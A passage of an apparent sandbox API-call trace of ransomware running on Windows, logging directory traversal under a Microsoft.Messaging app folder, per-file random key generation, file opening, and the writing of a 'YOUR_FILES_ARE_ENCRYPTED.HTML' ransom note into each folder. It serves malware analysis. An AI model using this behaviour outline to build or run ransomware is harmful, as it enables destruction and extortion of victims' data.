ftCreationTime.dwLowDateTime=0xf4213a66, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x26a02595, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26a02595, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.171] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4213a66, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x26a02595, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26a02595, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="..", cAlternateFileName="")) returned 1 [0116.171] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf458b6ed, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf458b6ed, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf458b6ed, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0116.171] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.171] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 104 [0116.171] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0116.171] lstrlenW (lpString=".lock") returned 5 [0116.171] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0116.172] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf426a58a, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x91aa6389, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x91aa6389, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0116.172] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.172] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Settings\\settings.dat") returned 104 [0116.172] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0116.172] lstrlenW (lpString=".dat") returned 4 [0116.172] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0116.172] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0116.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0116.172] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x26969b00, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26969b00, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26969b00, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0116.172] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.172] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1") returned 109 [0116.172] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0116.172] lstrlenW (lpString=".LOG1") returned 5 [0116.172] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0116.172] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x26969b00, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26969b00, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26969b00, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0116.172] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.172] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2") returned 109 [0116.172] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0116.172] lstrlenW (lpString=".LOG2") returned 5 [0116.172] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0116.172] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x26969b00, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x26969b00, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x26969b00, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0116.173] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.173] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0116.173] GetProcessHeap () returned 0x600000 [0116.173] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.174] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.175] CloseHandle (hObject=0x214) returned 1 [0116.175] GetProcessHeap () returned 0x600000 [0116.175] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.175] GetProcessHeap () returned 0x600000 [0116.175] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.176] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf426419d, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf426419d, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf426419d, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0116.176] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.176] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\SystemAppData") returned 96 [0116.176] GetProcessHeap () returned 0x600000 [0116.176] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.177] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\SystemAppData" [0116.177] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\SystemAppData\\*" [0116.177] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf426419d, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf426419d, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf426419d, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0116.178] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf426419d, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf426419d, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf426419d, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="..", cAlternateFileName="")) returned 1 [0116.178] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf426419d, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf426419d, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf426419d, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="..", cAlternateFileName="")) returned 0 [0116.178] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0116.178] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0116.178] GetProcessHeap () returned 0x600000 [0116.178] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.179] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.189] CloseHandle (hObject=0x214) returned 1 [0116.189] GetProcessHeap () returned 0x600000 [0116.189] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.189] GetProcessHeap () returned 0x600000 [0116.189] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.190] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41c9135, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x2636c21f, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2636c21f, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0116.190] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.190] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState") returned 92 [0116.190] GetProcessHeap () returned 0x600000 [0116.190] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.190] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState" [0116.190] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState\\*" [0116.191] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41c9135, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x2636c21f, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2636c21f, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.191] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41c9135, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x2636c21f, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2636c21f, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="..", cAlternateFileName="")) returned 1 [0116.191] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2636c21f, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2636c21f, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2636c21f, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="DbTemp", cAlternateFileName="")) returned 1 [0116.191] StrStrIW (lpFirst="DbTemp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.191] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState\\DbTemp") returned 99 [0116.191] GetProcessHeap () returned 0x600000 [0116.191] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.192] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState\\DbTemp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState\\DbTemp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState\\DbTemp" [0116.192] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState\\DbTemp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState\\DbTemp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState\\DbTemp\\*" [0116.192] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState\\DbTemp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2636c21f, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2636c21f, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2636c21f, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x19df88, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.192] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2636c21f, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2636c21f, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2636c21f, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x19df88, cFileName="..", cAlternateFileName="")) returned 1 [0116.192] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2636c21f, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2636c21f, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2636c21f, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x19df88, cFileName="..", cAlternateFileName="")) returned 0 [0116.192] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.192] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState\\DbTemp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0116.192] GetProcessHeap () returned 0x600000 [0116.192] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.193] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState\\DbTemp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\tempstate\\dbtemp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.193] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.194] CloseHandle (hObject=0x32c) returned 1 [0116.194] GetProcessHeap () returned 0x600000 [0116.194] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.194] GetProcessHeap () returned 0x600000 [0116.195] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.195] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2636c21f, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2636c21f, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2636c21f, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ef06, dwReserved1=0x62ee60, cFileName="DbTemp", cAlternateFileName="")) returned 0 [0116.195] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.195] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0116.195] GetProcessHeap () returned 0x600000 [0116.195] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.195] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.195] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.196] CloseHandle (hObject=0x214) returned 1 [0116.196] GetProcessHeap () returned 0x600000 [0116.196] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.196] GetProcessHeap () returned 0x600000 [0116.196] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.197] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41c9135, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0x2636c21f, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2636c21f, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0116.197] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.197] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0116.197] GetProcessHeap () returned 0x600000 [0116.198] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.messaging_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.198] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0116.199] CloseHandle 